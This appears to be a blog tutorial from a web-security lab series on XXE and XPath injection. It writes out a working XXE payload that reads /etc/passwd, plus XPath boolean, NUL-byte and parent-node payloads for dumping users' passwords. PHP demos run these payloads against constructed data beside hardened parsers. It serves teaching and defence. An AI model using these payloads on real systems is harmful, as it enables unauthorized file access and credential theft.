Hello friends, how are you? I hope you are doing well. We are closing in on the end of this series, and I really hope you have learned a lot, or at least a little :p If you did learn something, do tell us by commenting and sharing. Here are the other sections: MySQL Injection, Directory Traversal, File Include Attacks, Unrestricted File Upload, Command Injection Attacks, LDAP Injection.
XML eXternal Entity (XXE) attack:
External Entity: The set of valid entities can be extended by defining new entities in the DTD. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, external entities force the XML parser to fetch the resource specified by the URI, e.g. a file on the local machine or a resource on a remote system, and splice its contents into the document. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service against the local system, gain unauthorized access to files on the local machine, scan remote machines, and perform denial of service against remote systems.
So how do we exploit it?
The solution to this exercise is very simple: declare an external entity that points at the file we want, then reference it in the body so the parser substitutes the file contents.
Attacking payload (read system file: /etc/passwd):
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test>
PoC (with URL encoded):
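To see what the payload above actually does inside a PHP/libxml2 parser (the stack the lab's example2.php uses), here is an added example of my own, not code from the original post or from the lab. It writes a temporary file as a stand-in for /etc/passwd, parses the payload with and without LIBXML_NOENT, and then shows a hardened loader. The file name, the parse_untrusted_xml() function and the DOCTYPE check are my own choices, not something the page describes.

```php
<?php
// Added example, not code from the original post or the lab. It shows why the
// payload above reads a local file in a PHP/libxml2 parser and two ways to
// stop it. A temporary file stands in for /etc/passwd so it runs anywhere.

$secret = tempnam(sys_get_temp_dir(), 'xxe');
// Constructed stand-in for /etc/passwd.
file_put_contents($secret, "root:x:0:0:root:/root:/bin/bash\n");

// The page's payload, pointed at the temporary file (file:///tmp/xxe... on Unix).
$payload = '<!DOCTYPE test [<!ENTITY xxe SYSTEM "file://' . $secret . '">]>'
         . '<test>&xxe;</test>';

libxml_use_internal_errors(true);   // collect parser errors instead of printing warnings

// 1. Vulnerable: LIBXML_NOENT asks libxml2 to substitute entities. For an
//    external entity that means fetching the SYSTEM URI and splicing the
//    file into the <test> text node, which is exactly what the attacker wants.
$doc = simplexml_load_string($payload, 'SimpleXMLElement', LIBXML_NOENT);
echo "with LIBXML_NOENT: ", trim((string) $doc), "\n";   // prints the file contents

// 2. Without LIBXML_NOENT the reference is left as an unexpanded entity node
//    and the file is never read. Never pass LIBXML_NOENT for untrusted input.
$doc = simplexml_load_string($payload);
echo "without NOENT:     [", (string) $doc, "]\n";

// 3. Defence in depth: install an entity loader that resolves nothing, so a
//    caller who does pass LIBXML_NOENT still cannot reach disk or network,
//    and reject any document that carries a DTD at all.
libxml_set_external_entity_loader(function ($public, $system, $context) {
    return null;   // "not found" for every external entity
});

function parse_untrusted_xml(string $xml): ?SimpleXMLElement
{
    if (stripos($xml, '<!DOCTYPE') !== false) {
        return null;   // application data has no business declaring a DTD
    }
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    return $doc === false ? null : $doc;
}

var_dump(parse_untrusted_xml($payload));                      // NULL: rejected
echo (string) parse_untrusted_xml('<test>hello</test>'), "\n"; // hello

unlink($secret);
```

Run it with `php xxe_demo.php`. The first line prints the fake passwd contents, the second prints empty brackets, and the hardened parser refuses the payload outright while still accepting plain XML. The important caveat for PHP: since libxml 2.9 external entities are not loaded unless LIBXML_NOENT is passed, so grep your code base for that flag; the entity-loader callback and the DOCTYPE check are the belt and braces on top of that.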
XPath Injection:
In this example (the lab's example2.php), the code uses the user's input inside an XPath expression. XPath is a query language which selects nodes from an XML document. Imagine the XML document as a database and XPath as an SQL query: if you can manipulate the query, you will be able to retrieve elements to which you normally should not have access.
If we inject a single quote, we can see the following error:
Warning: SimpleXMLElement::XPath(): Invalid predicate in /var/www/xml/example2.php on line 7
Warning: SimpleXMLElement::XPath(): xmlXPathEval: evaluation failed in /var/www/xml/example2.php on line 7
Warning: Variable passed to each() is not an array or object in /var/www/xml/example2.php on line 8
Just like SQL injection, XPath allows you to use boolean logic, so you can try the following payloads:
' and '1'='1 should give the same result as the legitimate value.
' or '1'='0 should also give the same result.
' and '1'='0 should give no result at all.
' or '1'='1 should give all results, because the predicate is now true for every node.
Based on these tests and previous knowledge of XPath, it’s possible to get an idea of what the XPath expression looks like:
[PARENT NODES]/name[.='[INPUT]']/[CHILD NODES]
To comment out the rest of the XPath expression, you can use a NULL byte (which you will need to encode as %00): libxml2 receives the expression as a C string, so everything after the NULL byte is dropped. As we can see in the reconstructed expression above, we also need to add a ] to close the predicate and keep the syntax valid. Our payload now looks like hacker' or 1=1]%00 (the or 1=1 makes the predicate true for every node, so this returns all results).
If we try to list the children of the current node using the payload '%20or%201=1]/child::node()%00, we don't get much information.
The problem here is that we need to go back up the node hierarchy to get more information. In XPath this can be done with parent::* as part of the payload. We can now select the parent of the current node and display all of its child nodes with the same child::node() step.
One of the node values looks like a password. We can confirm this by checking whether the node's name is password with a similar payload.
In order to dump all the users' credentials, I use the payload ' or 1=1]%00, which makes example2.php build the variable $xpath as follows:
users/user/name[.='' or 1=1]%00']/parent::*/message
Here the %00 terminates the string as far as libxml2 is concerned, so the trailing ']/parent::*/message is discarded and the expression ends at our closing ]. The request looks like this:
http://[yourlab]/xml/example2.php?name=' or 1=1]%00
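The lab's example2.php is not reproduced on the page, so here is an added example of my own (not the lab's code) that models it: a constructed <users> document with the name/password/message structure the text walks through, the vulnerable concatenated query, the boolean, %00 and parent::* payloads from above, and a hardened lookup beside it. The user names and passwords are made up; the path is written absolute (/users/...) because SimpleXMLElement::xpath() evaluates relative paths from the element it is called on; the password-dumping payload is my extension of the parent::* idea and is not shown on the page. Requires PHP 8 (str_contains).

```php
<?php
// Added example (not the lab's own example2.php, which is not reproduced on
// the page): a constructed <users> document, the vulnerable query the text
// reconstructs, and a hardened lookup. Run with: php xpath_demo.php

$xml = <<<XML
<users>
  <user><name>hacker</name><password>hacker</password><message>Hello hacker</message></user>
  <user><name>admin</name><password>s3cret</password><message>Hello admin</message></user>
</users>
XML;
$doc = new SimpleXMLElement($xml);

// Vulnerable: $name is concatenated into the expression, as in example2.php.
function lookup_vulnerable(SimpleXMLElement $doc, string $name): array
{
    $query = "/users/user/name[.='$name']/parent::*/message";
    $nodes = @$doc->xpath($query);   // false on a syntax error (the "Invalid predicate" warning)
    return $nodes === false ? [] : array_map('strval', $nodes);
}

// Hardened: refuse NUL bytes (they truncate the C string libxml2 sees) and
// turn the value into a proper XPath 1.0 string literal. XPath 1.0 has no
// escape sequence, so a value containing both quote types is built with concat().
function xpath_literal(string $value): string
{
    if (!str_contains($value, "'")) {
        return "'" . $value . "'";
    }
    if (!str_contains($value, '"')) {
        return '"' . $value . '"';
    }
    $parts = array_map(fn (string $p): string => "'" . $p . "'", explode("'", $value));
    return 'concat(' . implode(', "\'", ', $parts) . ')';
}

function lookup_hardened(SimpleXMLElement $doc, string $name): array
{
    if (str_contains($name, "\0")) {
        return [];   // never let a NUL reach libxml2
    }
    $query = '/users/user/name[.=' . xpath_literal($name) . ']/parent::*/message';
    $nodes = $doc->xpath($query);
    return $nodes === false ? [] : array_map('strval', $nodes);
}

$payloads = [
    "hacker",                          // legitimate lookup: one message
    "'",                               // syntax error: xpath() returns false, like the warnings on the page
    "' or '1'='1",                     // boolean injection: every message
    "' or 1=1]\0",                     // the %00 payload: query cut after ']', so <name> nodes come back
    "' or 1=1]/parent::*/password\0",  // walk up and over to the sibling: dumps passwords (my extension)
];
foreach ($payloads as $p) {
    printf("%-36s vulnerable=%-34s hardened=%s\n",
        json_encode($p),
        json_encode(lookup_vulnerable($doc, $p)),
        json_encode(lookup_hardened($doc, $p)));
}
```

The vulnerable column reproduces the page step by step: a lone quote breaks the predicate, the boolean payload returns every message, the %00 payload truncates the expression so the result set becomes the <name> nodes the predicate selects, and replacing the cut-off tail with /parent::*/password returns the passwords. The hardened column returns nothing for every injected value because the whole input ends up inside a quoted literal. If your parameter only ever holds a username, an allowlist such as preg_match('/^[A-Za-z0-9_.-]+$/', $name) is simpler still and removes the need for xpath_literal().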